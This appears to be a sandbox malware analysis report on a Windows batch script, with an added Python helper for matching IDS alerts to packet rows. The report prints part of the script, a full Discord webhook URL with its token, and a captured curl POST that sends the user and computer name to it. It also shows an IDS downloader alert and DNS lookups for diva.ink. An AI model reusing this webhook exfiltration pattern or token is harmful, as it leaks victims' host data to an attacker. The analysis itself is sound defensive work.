                                                                                                                              SHA1:697e5683ea6cc8a640d88959e893bf19e264aba4
                                                                                                                              SHA256:d0dd54a04d8c0ec90877013ed6314793ce52537f72143c35bdc2646c26dd3fae
                                                                                                                              SHA512:2e9eea80fcadb0e315de62f2bf0ce973470712147af7df4a1b80a32ac2a0a31096b7e3b88cd8adf9bd4aac70b1d8482bfae47b3e0c8ae5eeb738573601ec35fa
                                                                                                                              SSDEEP:3072:wHzoRbKdUOGbarWuUsYFrEj9Jx945oT+Qwbxycc4uxNwq:E4lOJrW7DRE7goKQkhc4uvJ
                                                                                                                              TLSH:17B3F17868DD734C1912F4AFF744A486BBC9066F42831B05722CCA297BF44BD2B91D9B
                                                                                                                              File Content Preview:@echo off....setlocal EnableDelayedExpansion....REM Set user and computer information..set "User=%USERNAME%"..set "ComputerName=%COMPUTERNAME%"....REM Define Discord Webhook URL..set "WebhookURL=https://discord.com/api/webhooks/1292044762974785547/-sVDk3i
                                                                                                                              Icon Hash:9686878b929a9886
Timestamp                        SID      Signature                                                                             Severity  Source IP    Source Port  Dest IP          Dest Port  Protocol
2024-10-06T13:37:33.646580+0200  2019714  ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile  2         192.168.2.8  64901        185.199.108.153  443        TCP
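The IDS alert above and the TCP packet rows of this report are extracted with their columns run together (timestamp, ports and addresses with no separator), which makes it awkward to tie the hit back to a flow by hand. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it reads a handful of rows copied from this report (constructed sample input), enumerates every way the fused digits could split into ports and addresses, keeps the single reading consistent with two stated assumptions (the sandbox VM is 192.168.2.8, as it appears throughout the report, and each flow pairs a service port below 1024 with a Windows dynamic port at or above 49152), then attaches the ET alert with SID 2019714 to the 64901 -> 443 flow to 185.199.108.153 and reports how far the nearest captured packet is from the alert time. The CEST offset and the 7-digit SID width are also assumptions; an ambiguous row raises instead of being guessed.

```python
import re
from datetime import datetime, timedelta, timezone

# Constructed sample: rows copied from this report's packet and IDS tables in the
# fused form the HTML-to-text extraction left them in (no column separators).
PACKET_ROWS = """\
Oct 6, 2024 13:36:06.451499939 CEST49707443192.168.2.8162.159.137.232
Oct 6, 2024 13:36:06.451534033 CEST44349707162.159.137.232192.168.2.8
Oct 6, 2024 13:37:32.996743917 CEST64901443192.168.2.8185.199.108.153
Oct 6, 2024 13:37:32.996834993 CEST44364901185.199.108.153192.168.2.8
Oct 6, 2024 13:37:33.646600008 CEST44364901185.199.108.153192.168.2.8
""".splitlines()
ALERT_ROWS = ["2024-10-06T13:37:33.646580+02002019714ET MALWARE Terse alphanumeric executable "
              "downloader high likelihood of being hostile2192.168.2.864901185.199.108.153443TCP"]

ANALYSIS_HOST = "192.168.2.8"  # the sandbox VM, as it appears throughout the report
EPHEMERAL_MIN = 49152          # assumption: Windows dynamic (client) port range
TZ = {"CEST": timezone(timedelta(hours=2))}  # assumption: the report's zone abbreviation

IP_PREFIX = re.compile(r"(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.")
PACKET_RE = re.compile(r"^(?P<ts>\w{3} \d{1,2}, \d{4} \d\d:\d\d:\d\d\.\d+) (?P<tz>[A-Z]+)(?P<fused>[\d.]+)$")
ALERT_RE = re.compile(r"^(?P<ts>\d{4}-\d\d-\d\dT\d\d:\d\d:\d\d\.\d+[+-]\d{4})(?P<sid>\d{7})"
                      r"(?P<sig>.*?)(?P<sev>\d)(?P<fused>[\d.]+)(?P<proto>[A-Z]+)$")  # 7-digit SID assumed

def _num_ok(s, limit):  # digits only, no leading zero, within range
    return s.isdigit() and (s == "0" or s[0] != "0") and int(s) <= limit

def _ports_at(fused, pos):  # every 1-5 digit port readable at pos -> (port, end)
    for n in range(1, 6):
        tok = fused[pos:pos + n]
        if len(tok) == n and _num_ok(tok, 65535):
            yield int(tok), pos + n

def _ips_at(fused, pos):  # every dotted quad readable at pos -> (ip, end)
    m = IP_PREFIX.match(fused, pos)  # the first three octets are dot-terminated,
    if not m or not all(_num_ok(o, 255) for o in m.groups()):  # only the last is ambiguous
        return
    for n in (1, 2, 3):
        last = fused[m.end():m.end() + n]
        if len(last) == n and _num_ok(last, 255):
            yield ".".join(m.groups() + (last,)), m.end() + n

def tokenize(fused, shape, pos=0):  # every reading of fused as the token kinds in shape
    if not shape:
        if pos == len(fused):
            yield ()
        return
    reader = _ports_at if shape[0] == "port" else _ips_at
    for value, end in reader(fused, pos):
        for tail in tokenize(fused, shape[1:], end):
            yield (value,) + tail

def plausible(d):  # exactly one endpoint is the VM; one service port, one dynamic port
    one_is_vm = (d["src_ip"] == ANALYSIS_HOST) != (d["dst_ip"] == ANALYSIS_HOST)
    sp, dp = d["src_port"], d["dst_port"]
    return one_is_vm and (sp < 1024) != (dp < 1024) and max(sp, dp) >= EPHEMERAL_MIN

def _unique(fused, shape, names):  # the one plausible reading; raise rather than guess
    readings = [dict(zip(names, r)) for r in tokenize(fused, shape)]
    keep = [d for d in readings if plausible(d)]
    if len(keep) != 1:
        raise ValueError(f"{fused!r}: {len(keep)} plausible readings of {len(readings)}")
    return keep[0]

def parse_packet(row):
    m = PACKET_RE.match(row)
    if not m: raise ValueError(f"unrecognised packet row: {row!r}")
    base, frac = m["ts"].rsplit(".", 1)  # strptime accepts at most 6 fractional digits
    ts = datetime.strptime(f"{base}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")
    d = _unique(m["fused"], ["port", "port", "ip", "ip"], ["src_port", "dst_port", "src_ip", "dst_ip"])
    d["ts"] = ts.replace(tzinfo=TZ[m["tz"]])
    return d

def parse_alert(row):
    m = ALERT_RE.match(row)
    if not m: raise ValueError(f"unrecognised alert row: {row!r}")
    d = _unique(m["fused"], ["ip", "port", "ip", "port"], ["src_ip", "src_port", "dst_ip", "dst_port"])
    d.update(ts=datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%S.%f%z"), sid=int(m["sid"]),
             signature=m["sig"], severity=int(m["sev"]), proto=m["proto"])
    return d

def flow_key(d):  # canonical (client_ip, client_port, server_ip, server_port); client = VM side
    if d["src_ip"] == ANALYSIS_HOST:
        return d["src_ip"], d["src_port"], d["dst_ip"], d["dst_port"]
    return d["dst_ip"], d["dst_port"], d["src_ip"], d["src_port"]

def correlate(packet_rows, alert_rows):
    """Attach each alert to its flow and to the packet captured nearest the alert time."""
    flows = {}
    for p in map(parse_packet, packet_rows):
        flows.setdefault(flow_key(p), []).append(p)
    out = []
    for a in map(parse_alert, alert_rows):
        pkts = flows.get(flow_key(a), [])
        nearest = min(pkts, key=lambda p: abs(p["ts"] - a["ts"]), default=None)
        offset = None if nearest is None else (nearest["ts"] - a["ts"]) // timedelta(microseconds=1)
        out.append({"sid": a["sid"], "signature": a["signature"], "flow": flow_key(a),
                    "packets_in_flow": len(pkts), "nearest_packet_offset_us": offset})
    return out
```

Running `correlate(PACKET_ROWS, ALERT_ROWS)` on the sample rows yields the alert pinned to the flow ("192.168.2.8", 64901, "185.199.108.153", 443) with the nearest packet 20 microseconds after the alert timestamp; the two 49707 rows form a separate flow to 162.159.137.232 and are left untouched. The enumeration is deliberately exhaustive: the fused string 49707443192.168.2.8162.159.137.232 admits several digit-level readings (for example 4970/7443 or 192.168.2.81/62.159.137.232), and only the VM-address and port-range constraints pick the right one, so widen those constraints rather than trusting a single regex if the capture contains non-standard service ports.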
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Oct 6, 2024 13:36:06.451499939 CEST  49707        443        192.168.2.8      162.159.137.232
Oct 6, 2024 13:36:06.451534033 CEST  443          49707      162.159.137.232  192.168.2.8
Oct 6, 2024 13:36:06.451687098 CEST  49707        443        192.168.2.8      162.159.137.232
Oct 6, 2024 13:36:06.496603966 CEST  49707        443        192.168.2.8      162.159.137.232
Oct 6, 2024 13:36:06.496623993 CEST  443          49707      162.159.137.232  192.168.2.8
Oct 6, 2024 13:36:06.977086067 CEST  443          49707      162.159.137.232  192.168.2.8
Oct 6, 2024 13:36:06.977221966 CEST  49707        443        192.168.2.8      162.159.137.232
Oct 6, 2024 13:36:07.000583887 CEST  49707        443        192.168.2.8      162.159.137.232
Oct 6, 2024 13:36:07.000614882 CEST  443          49707      162.159.137.232  192.168.2.8
Oct 6, 2024 13:36:07.001049042 CEST  443          49707      162.159.137.232  192.168.2.8
Oct 6, 2024 13:36:07.003595114 CEST  49707        443        192.168.2.8      162.159.137.232
Oct 6, 2024 13:36:07.047451019 CEST  443          49707      162.159.137.232  192.168.2.8
Oct 6, 2024 13:36:07.151778936 CEST  443          49707      162.159.137.232  192.168.2.8
Oct 6, 2024 13:36:07.151927948 CEST  443          49707      162.159.137.232  192.168.2.8
Oct 6, 2024 13:36:07.152144909 CEST  49707        443        192.168.2.8      162.159.137.232
Oct 6, 2024 13:36:07.173063040 CEST  49707        443        192.168.2.8      162.159.137.232
Oct 6, 2024 13:36:07.173090935 CEST  443          49707      162.159.137.232  192.168.2.8
Oct 6, 2024 13:36:07.886632919 CEST  49710        443        192.168.2.8      162.159.137.232
Oct 6, 2024 13:36:07.886696100 CEST  443          49710      162.159.137.232  192.168.2.8
Oct 6, 2024 13:36:07.886768103 CEST  49710        443        192.168.2.8      162.159.137.232
Oct 6, 2024 13:36:07.895323992 CEST  49710        443        192.168.2.8      162.159.137.232
Oct 6, 2024 13:36:07.895351887 CEST  443          49710      162.159.137.232  192.168.2.8
Oct 6, 2024 13:36:08.376542091 CEST  443          49710      162.159.137.232  192.168.2.8
Oct 6, 2024 13:36:08.376626968 CEST  49710        443        192.168.2.8      162.159.137.232
Oct 6, 2024 13:36:08.378149033 CEST  49710        443        192.168.2.8      162.159.137.232
Oct 6, 2024 13:36:08.378163099 CEST  443          49710      162.159.137.232  192.168.2.8
Oct 6, 2024 13:36:08.378448963 CEST  443          49710      162.159.137.232  192.168.2.8
Oct 6, 2024 13:36:08.381134033 CEST  49710        443        192.168.2.8      162.159.137.232
Oct 6, 2024 13:36:08.423404932 CEST  443          49710      162.159.137.232  192.168.2.8
Oct 6, 2024 13:36:08.581942081 CEST  443          49710      162.159.137.232  192.168.2.8
Oct 6, 2024 13:36:08.582055092 CEST  443          49710      162.159.137.232  192.168.2.8
Oct 6, 2024 13:36:08.582187891 CEST  49710        443        192.168.2.8      162.159.137.232
Oct 6, 2024 13:36:08.588017941 CEST  49710        443        192.168.2.8      162.159.137.232
Oct 6, 2024 13:36:08.588036060 CEST  443          49710      162.159.137.232  192.168.2.8
Oct 6, 2024 13:37:27.865860939 CEST  64892        443        192.168.2.8      162.159.128.233
Oct 6, 2024 13:37:27.865906954 CEST  443          64892      162.159.128.233  192.168.2.8
Oct 6, 2024 13:37:27.866054058 CEST  64892        443        192.168.2.8      162.159.128.233
Oct 6, 2024 13:37:27.885365009 CEST  64892        443        192.168.2.8      162.159.128.233
Oct 6, 2024 13:37:27.885390043 CEST  443          64892      162.159.128.233  192.168.2.8
Oct 6, 2024 13:37:28.378957987 CEST  443          64892      162.159.128.233  192.168.2.8
Oct 6, 2024 13:37:28.379045010 CEST  64892        443        192.168.2.8      162.159.128.233
Oct 6, 2024 13:37:28.384465933 CEST  64892        443        192.168.2.8      162.159.128.233
Oct 6, 2024 13:37:28.384485006 CEST  443          64892      162.159.128.233  192.168.2.8
Oct 6, 2024 13:37:28.384852886 CEST  443          64892      162.159.128.233  192.168.2.8
Oct 6, 2024 13:37:28.395589113 CEST  64892        443        192.168.2.8      162.159.128.233
Oct 6, 2024 13:37:28.439400911 CEST  443          64892      162.159.128.233  192.168.2.8
Oct 6, 2024 13:37:28.553189993 CEST  443          64892      162.159.128.233  192.168.2.8
Oct 6, 2024 13:37:28.553448915 CEST  443          64892      162.159.128.233  192.168.2.8
Oct 6, 2024 13:37:28.553606987 CEST  64892        443        192.168.2.8      162.159.128.233
Oct 6, 2024 13:37:28.577461004 CEST  64892        443        192.168.2.8      162.159.128.233
Oct 6, 2024 13:37:28.577500105 CEST  443          64892      162.159.128.233  192.168.2.8
Oct 6, 2024 13:37:30.042697906 CEST  64897        443        192.168.2.8      162.159.128.233
Oct 6, 2024 13:37:30.042764902 CEST  443          64897      162.159.128.233  192.168.2.8
Oct 6, 2024 13:37:30.042972088 CEST  64897        443        192.168.2.8      162.159.128.233
Oct 6, 2024 13:37:30.198647976 CEST  64897        443        192.168.2.8      162.159.128.233
Oct 6, 2024 13:37:30.198724031 CEST  443          64897      162.159.128.233  192.168.2.8
Oct 6, 2024 13:37:30.694663048 CEST  443          64897      162.159.128.233  192.168.2.8
Oct 6, 2024 13:37:30.694745064 CEST  64897        443        192.168.2.8      162.159.128.233
Oct 6, 2024 13:37:30.696676016 CEST  64897        443        192.168.2.8      162.159.128.233
Oct 6, 2024 13:37:30.696702003 CEST  443          64897      162.159.128.233  192.168.2.8
Oct 6, 2024 13:37:30.697540998 CEST  443          64897      162.159.128.233  192.168.2.8
Oct 6, 2024 13:37:30.700623989 CEST  64897        443        192.168.2.8      162.159.128.233
Oct 6, 2024 13:37:30.743402958 CEST  443          64897      162.159.128.233  192.168.2.8
Oct 6, 2024 13:37:30.869401932 CEST  443          64897      162.159.128.233  192.168.2.8
Oct 6, 2024 13:37:30.869715929 CEST  443          64897      162.159.128.233  192.168.2.8
Oct 6, 2024 13:37:30.869784117 CEST  64897        443        192.168.2.8      162.159.128.233
Oct 6, 2024 13:37:30.955557108 CEST  64897        443        192.168.2.8      162.159.128.233
Oct 6, 2024 13:37:30.955610991 CEST  443          64897      162.159.128.233  192.168.2.8
Oct 6, 2024 13:37:32.996743917 CEST  64901        443        192.168.2.8      185.199.108.153
Oct 6, 2024 13:37:32.996834993 CEST  443          64901      185.199.108.153  192.168.2.8
Oct 6, 2024 13:37:32.997545004 CEST  64901        443        192.168.2.8      185.199.108.153
Oct 6, 2024 13:37:33.028844118 CEST  64901        443        192.168.2.8      185.199.108.153
Oct 6, 2024 13:37:33.028875113 CEST  443          64901      185.199.108.153  192.168.2.8
Oct 6, 2024 13:37:33.497859955 CEST  443          64901      185.199.108.153  192.168.2.8
Oct 6, 2024 13:37:33.497999907 CEST  64901        443        192.168.2.8      185.199.108.153
Oct 6, 2024 13:37:33.502350092 CEST  64901        443        192.168.2.8      185.199.108.153
Oct 6, 2024 13:37:33.502383947 CEST  443          64901      185.199.108.153  192.168.2.8
Oct 6, 2024 13:37:33.502638102 CEST  443          64901      185.199.108.153  192.168.2.8
Oct 6, 2024 13:37:33.518043041 CEST  64901        443        192.168.2.8      185.199.108.153
Oct 6, 2024 13:37:33.559406042 CEST  443          64901      185.199.108.153  192.168.2.8
Oct 6, 2024 13:37:33.646600008 CEST  443          64901      185.199.108.153  192.168.2.8
Oct 6, 2024 13:37:33.646691084 CEST  443          64901      185.199.108.153  192.168.2.8
Oct 6, 2024 13:37:33.646770000 CEST  64901        443        192.168.2.8      185.199.108.153
Oct 6, 2024 13:37:33.646800041 CEST  443          64901      185.199.108.153  192.168.2.8
Oct 6, 2024 13:37:33.647084951 CEST  443          64901      185.199.108.153  192.168.2.8
Oct 6, 2024 13:37:33.647130013 CEST  443          64901      185.199.108.153  192.168.2.8
Oct 6, 2024 13:37:33.647135973 CEST  64901        443        192.168.2.8      185.199.108.153
Oct 6, 2024 13:37:33.647146940 CEST  443          64901      185.199.108.153  192.168.2.8
Oct 6, 2024 13:37:33.647197008 CEST  64901        443        192.168.2.8      185.199.108.153
Oct 6, 2024 13:37:33.647206068 CEST  443          64901      185.199.108.153  192.168.2.8
Oct 6, 2024 13:37:33.647479057 CEST  443          64901      185.199.108.153  192.168.2.8
Oct 6, 2024 13:37:33.647831917 CEST  64901        443        192.168.2.8      185.199.108.153
Oct 6, 2024 13:37:33.647840977 CEST  443          64901      185.199.108.153  192.168.2.8
Oct 6, 2024 13:37:33.651431084 CEST  443          64901      185.199.108.153  192.168.2.8
Oct 6, 2024 13:37:33.651477098 CEST  443          64901      185.199.108.153  192.168.2.8
Oct 6, 2024 13:37:33.651500940 CEST  443          64901      185.199.108.153  192.168.2.8
Oct 6, 2024 13:37:33.651532888 CEST  64901        443        192.168.2.8      185.199.108.153
Oct 6, 2024 13:37:33.651576042 CEST  443          64901      185.199.108.153  192.168.2.8
Oct 6, 2024 13:37:33.651606083 CEST  64901        443        192.168.2.8      185.199.108.153
Oct 6, 2024 13:37:33.709163904 CEST  64901        443        192.168.2.8      185.199.108.153
Oct 6, 2024 13:37:33.709192991 CEST  443          64901      185.199.108.153  192.168.2.8
Oct 6, 2024 13:37:33.735368967 CEST  443          64901      185.199.108.153  192.168.2.8
Oct 6, 2024 13:37:33.735409975 CEST  443          64901      185.199.108.153  192.168.2.8
Oct 6, 2024 13:37:33.735444069 CEST  443          64901      185.199.108.153  192.168.2.8
Oct 6, 2024 13:37:33.735455990 CEST  64901        443        192.168.2.8      185.199.108.153
Oct 6, 2024 13:37:33.735497952 CEST  443          64901      185.199.108.153  192.168.2.8
Oct 6, 2024 13:37:33.735536098 CEST  64901        443        192.168.2.8      185.199.108.153
Oct 6, 2024 13:37:33.735557079 CEST  443          64901      185.199.108.153  192.168.2.8
Oct 6, 2024 13:37:33.735589981 CEST  443          64901      185.199.108.153  192.168.2.8
Oct 6, 2024 13:37:33.735604048 CEST  64901        443        192.168.2.8      185.199.108.153
Oct 6, 2024 13:37:33.735620975 CEST  443          64901      185.199.108.153  192.168.2.8
Oct 6, 2024 13:37:33.735701084 CEST  443          64901      185.199.108.153  192.168.2.8
Oct 6, 2024 13:37:33.735753059 CEST  64901        443        192.168.2.8      185.199.108.153
Oct 6, 2024 13:37:33.735755920 CEST  443          64901      185.199.108.153  192.168.2.8
Oct 6, 2024 13:37:33.735768080 CEST  443          64901      185.199.108.153  192.168.2.8
Oct 6, 2024 13:37:33.735796928 CEST  64901        443        192.168.2.8      185.199.108.153
Oct 6, 2024 13:37:33.735833883 CEST  443          64901      185.199.108.153  192.168.2.8
Oct 6, 2024 13:37:33.735881090 CEST  64901        443        192.168.2.8      185.199.108.153
Oct 6, 2024 13:37:33.735898018 CEST  443          64901      185.199.108.153  192.168.2.8
Oct 6, 2024 13:37:33.736613989 CEST  443          64901      185.199.108.153  192.168.2.8
Oct 6, 2024 13:37:33.736653090 CEST  443          64901      185.199.108.153  192.168.2.8
Oct 6, 2024 13:37:33.736684084 CEST  443          64901      185.199.108.153  192.168.2.8
Oct 6, 2024 13:37:33.736711979 CEST  64901        443        192.168.2.8      185.199.108.153
Oct 6, 2024 13:37:33.736712933 CEST  443          64901      185.199.108.153  192.168.2.8
Oct 6, 2024 13:37:33.736725092 CEST  443          64901      185.199.108.153  192.168.2.8
Oct 6, 2024 13:37:33.736737013 CEST  64901        443        192.168.2.8      185.199.108.153
Oct 6, 2024 13:37:33.736793041 CEST  64901        443        192.168.2.8      185.199.108.153
Oct 6, 2024 13:37:33.736807108 CEST  443          64901      185.199.108.153  192.168.2.8
Oct 6, 2024 13:37:33.737571001 CEST  443          64901      185.199.108.153  192.168.2.8
Oct 6, 2024 13:37:33.737602949 CEST  443          64901      185.199.108.153  192.168.2.8
Oct 6, 2024 13:37:33.737641096 CEST  443          64901      185.199.108.153  192.168.2.8
Oct 6, 2024 13:37:33.737643957 CEST  64901        443        192.168.2.8      185.199.108.153
Oct 6, 2024 13:37:33.737658024 CEST  443          64901      185.199.108.153  192.168.2.8
Oct 6, 2024 13:37:33.737709045 CEST  64901        443        192.168.2.8      185.199.108.153
Oct 6, 2024 13:37:33.737723112 CEST  443          64901      185.199.108.153  192.168.2.8
Oct 6, 2024 13:37:33.737781048 CEST  64901        443        192.168.2.8      185.199.108.153
Oct 6, 2024 13:37:33.824117899 CEST  443          64901      185.199.108.153  192.168.2.8
Oct 6, 2024 13:37:33.824131012 CEST  443          64901      185.199.108.153  192.168.2.8
Oct 6, 2024 13:37:33.824182987 CEST  443          64901      185.199.108.153  192.168.2.8
Oct 6, 2024 13:37:33.824239016 CEST  64901        443        192.168.2.8      185.199.108.153
Oct 6, 2024 13:37:33.824296951 CEST  443          64901      185.199.108.153  192.168.2.8
Oct 6, 2024 13:37:33.824327946 CEST  64901        443        192.168.2.8      185.199.108.153
Oct 6, 2024 13:37:33.824351072 CEST  64901        443        192.168.2.8      185.199.108.153
Oct 6, 2024 13:37:33.825649977 CEST  443          64901      185.199.108.153  192.168.2.8
Oct 6, 2024 13:37:33.825695038 CEST  443          64901      185.199.108.153  192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:33.825727940 CEST44364901185.199.108.153192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:33.825762987 CEST64901443192.168.2.8185.199.108.153
                                                                                                                              Oct 6, 2024 13:37:33.825794935 CEST64901443192.168.2.8185.199.108.153
                                                                                                                              Oct 6, 2024 13:37:33.879122972 CEST64901443192.168.2.8185.199.108.153
                                                                                                                              Oct 6, 2024 13:37:39.345514059 CEST64913443192.168.2.8162.159.128.233
                                                                                                                              Oct 6, 2024 13:37:39.345573902 CEST44364913162.159.128.233192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:39.345774889 CEST64913443192.168.2.8162.159.128.233
                                                                                                                              Oct 6, 2024 13:37:39.348459005 CEST64913443192.168.2.8162.159.128.233
                                                                                                                              Oct 6, 2024 13:37:39.348478079 CEST44364913162.159.128.233192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:39.804754972 CEST44364913162.159.128.233192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:39.804827929 CEST64913443192.168.2.8162.159.128.233
                                                                                                                              Oct 6, 2024 13:37:39.806220055 CEST64913443192.168.2.8162.159.128.233
                                                                                                                              Oct 6, 2024 13:37:39.806230068 CEST44364913162.159.128.233192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:39.806458950 CEST44364913162.159.128.233192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:39.812846899 CEST64913443192.168.2.8162.159.128.233
                                                                                                                              Oct 6, 2024 13:37:39.855391979 CEST44364913162.159.128.233192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:39.918857098 CEST44364913162.159.128.233192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:39.920738935 CEST64913443192.168.2.8162.159.128.233
                                                                                                                              Oct 6, 2024 13:37:39.920768023 CEST44364913162.159.128.233192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:40.053556919 CEST44364913162.159.128.233192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:40.053653002 CEST44364913162.159.128.233192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:40.054060936 CEST64913443192.168.2.8162.159.128.233
                                                                                                                              Oct 6, 2024 13:37:40.061327934 CEST64913443192.168.2.8162.159.128.233
Timestamp                            Source Port  Dest Port  Source IP     Dest IP
Oct 6, 2024 13:36:06.417610884 CEST  57474        53         192.168.2.8   1.1.1.1
Oct 6, 2024 13:36:06.424930096 CEST  53           57474      1.1.1.1       192.168.2.8
Oct 6, 2024 13:36:44.185844898 CEST  53           57644      162.159.36.2  192.168.2.8
Oct 6, 2024 13:36:44.702611923 CEST  51696        53         192.168.2.8   1.1.1.1
Oct 6, 2024 13:36:44.710079908 CEST  53           51696      1.1.1.1       192.168.2.8
Oct 6, 2024 13:37:27.707142115 CEST  60919        53         192.168.2.8   1.1.1.1
Oct 6, 2024 13:37:27.805810928 CEST  53           60919      1.1.1.1       192.168.2.8
Oct 6, 2024 13:37:31.789787054 CEST  50877        53         192.168.2.8   1.1.1.1
Oct 6, 2024 13:37:32.979408979 CEST  62008        53         192.168.2.8   1.1.1.1
Oct 6, 2024 13:37:32.990900040 CEST  53           62008      1.1.1.1       192.168.2.8
Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                      Type                  Class        DNS over HTTPS
Oct 6, 2024 13:36:06.417610884 CEST  192.168.2.8  1.1.1.1  0x2d44    Standard query (0)  discord.com               A (IP address)        IN (0x0001)  false
Oct 6, 2024 13:36:44.702611923 CEST  192.168.2.8  1.1.1.1  0xe0a7    Standard query (0)  18.31.95.13.in-addr.arpa  PTR (Pointer record)  IN (0x0001)  false
Oct 6, 2024 13:37:27.707142115 CEST  192.168.2.8  1.1.1.1  0xd367    Standard query (0)  ptb.discord.com           A (IP address)        IN (0x0001)  false
Oct 6, 2024 13:37:31.789787054 CEST  192.168.2.8  1.1.1.1  0xc2e1    Standard query (0)  api.msn.com               A (IP address)        IN (0x0001)  false
Oct 6, 2024 13:37:32.979408979 CEST  192.168.2.8  1.1.1.1  0x438b    Standard query (0)  diva.ink                  A (IP address)        IN (0x0001)  false
Timestamp                            Source IP  Dest IP      Trans ID  Reply Code      Name                         CName                            Address          Type                    Class        DNS over HTTPS
Oct 6, 2024 13:36:06.424930096 CEST  1.1.1.1    192.168.2.8  0x2d44    No error (0)    discord.com                                                   162.159.137.232  A (IP address)          IN (0x0001)  false
Oct 6, 2024 13:36:06.424930096 CEST  1.1.1.1    192.168.2.8  0x2d44    No error (0)    discord.com                                                   162.159.135.232  A (IP address)          IN (0x0001)  false
Oct 6, 2024 13:36:06.424930096 CEST  1.1.1.1    192.168.2.8  0x2d44    No error (0)    discord.com                                                   162.159.138.232  A (IP address)          IN (0x0001)  false
Oct 6, 2024 13:36:06.424930096 CEST  1.1.1.1    192.168.2.8  0x2d44    No error (0)    discord.com                                                   162.159.128.233  A (IP address)          IN (0x0001)  false
Oct 6, 2024 13:36:06.424930096 CEST  1.1.1.1    192.168.2.8  0x2d44    No error (0)    discord.com                                                   162.159.136.232  A (IP address)          IN (0x0001)  false
Oct 6, 2024 13:36:36.048624039 CEST  1.1.1.1    192.168.2.8  0x5304    No error (0)    bg.microsoft.map.fastly.net                                   199.232.210.172  A (IP address)          IN (0x0001)  false
Oct 6, 2024 13:36:36.048624039 CEST  1.1.1.1    192.168.2.8  0x5304    No error (0)    bg.microsoft.map.fastly.net                                   199.232.214.172  A (IP address)          IN (0x0001)  false
Oct 6, 2024 13:36:44.710079908 CEST  1.1.1.1    192.168.2.8  0xe0a7    Name error (3)  18.31.95.13.in-addr.arpa     none                             none             PTR (Pointer record)    IN (0x0001)  false
Oct 6, 2024 13:37:24.491537094 CEST  1.1.1.1    192.168.2.8  0x4dbc    No error (0)    windowsupdatebg.s.llnwi.net                                   178.79.238.128   A (IP address)          IN (0x0001)  false
Oct 6, 2024 13:37:24.491537094 CEST  1.1.1.1    192.168.2.8  0x4dbc    No error (0)    windowsupdatebg.s.llnwi.net                                   178.79.238.0     A (IP address)          IN (0x0001)  false
Oct 6, 2024 13:37:27.805810928 CEST  1.1.1.1    192.168.2.8  0xd367    No error (0)    ptb.discord.com                                               162.159.128.233  A (IP address)          IN (0x0001)  false
Oct 6, 2024 13:37:27.805810928 CEST  1.1.1.1    192.168.2.8  0xd367    No error (0)    ptb.discord.com                                               162.159.135.232  A (IP address)          IN (0x0001)  false
Oct 6, 2024 13:37:27.805810928 CEST  1.1.1.1    192.168.2.8  0xd367    No error (0)    ptb.discord.com                                               162.159.137.232  A (IP address)          IN (0x0001)  false
Oct 6, 2024 13:37:27.805810928 CEST  1.1.1.1    192.168.2.8  0xd367    No error (0)    ptb.discord.com                                               162.159.138.232  A (IP address)          IN (0x0001)  false
Oct 6, 2024 13:37:27.805810928 CEST  1.1.1.1    192.168.2.8  0xd367    No error (0)    ptb.discord.com                                               162.159.136.232  A (IP address)          IN (0x0001)  false
Oct 6, 2024 13:37:31.797068119 CEST  1.1.1.1    192.168.2.8  0xc2e1    No error (0)    api.msn.com                  api-msn-com.a-0003.a-msedge.net                   CNAME (Canonical name)  IN (0x0001)  false
Oct 6, 2024 13:37:32.990900040 CEST  1.1.1.1    192.168.2.8  0x438b    No error (0)    diva.ink                                                      185.199.108.153  A (IP address)          IN (0x0001)  false
Oct 6, 2024 13:37:32.990900040 CEST  1.1.1.1    192.168.2.8  0x438b    No error (0)    diva.ink                                                      185.199.111.153  A (IP address)          IN (0x0001)  false
Oct 6, 2024 13:37:32.990900040 CEST  1.1.1.1    192.168.2.8  0x438b    No error (0)    diva.ink                                                      185.199.110.153  A (IP address)          IN (0x0001)  false
Oct 6, 2024 13:37:32.990900040 CEST  1.1.1.1    192.168.2.8  0x438b    No error (0)    diva.ink                                                      185.199.109.153  A (IP address)          IN (0x0001)  false
• discord.com
• ptb.discord.com
• diva.ink
Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
0           192.168.2.8  49707        162.159.137.232  443               3700  C:\Windows\System32\curl.exe

Timestamp                Bytes transferred  Direction  Data
2024-10-06 11:36:07 UTC  229                OUT
  POST /api/webhooks/1292044762974785547/-sVDk3ilu3WEM17kfI_edy7EuWfHE7f0bes056ngUTuZWTzgcxB9dhTgyQxwaVvv2Sgz HTTP/1.1
  Host: discord.com
  User-Agent: curl/7.83.1
  Accept: */*
  Content-Type: application/json
  Content-Length: 47
2024-10-06 11:36:07 UTC  47                 OUT
  Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 22 55 73 65 72 3a 20 68 75 62 65 72 74 2c 20 43 6f 6d 70 75 74 65 72 3a 20 48 55 42 45 52 54 2d 50 43 22 7d
  Data Ascii: {"content":"User: user, Computer: user-PC"}
2024-10-06 11:36:07 UTC  1333               IN
  HTTP/1.1 404 Not Found
  Date: Sun, 06 Oct 2024 11:36:07 GMT
  Content-Type: application/json
  Content-Length: 45
  Connection: close
  set-cookie: __dcfduid=2d2e4b4e83d711efbbb5069e833022f9; Expires=Fri, 05-Oct-2029 11:36:07 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
  strict-transport-security: max-age=31536000; includeSubDomains; preload
  x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
  x-ratelimit-limit: 5
  x-ratelimit-remaining: 4
  x-ratelimit-reset: 1728214568
  x-ratelimit-reset-after: 1
  via: 1.1 google
  CF-Cache-Status: DYNAMIC
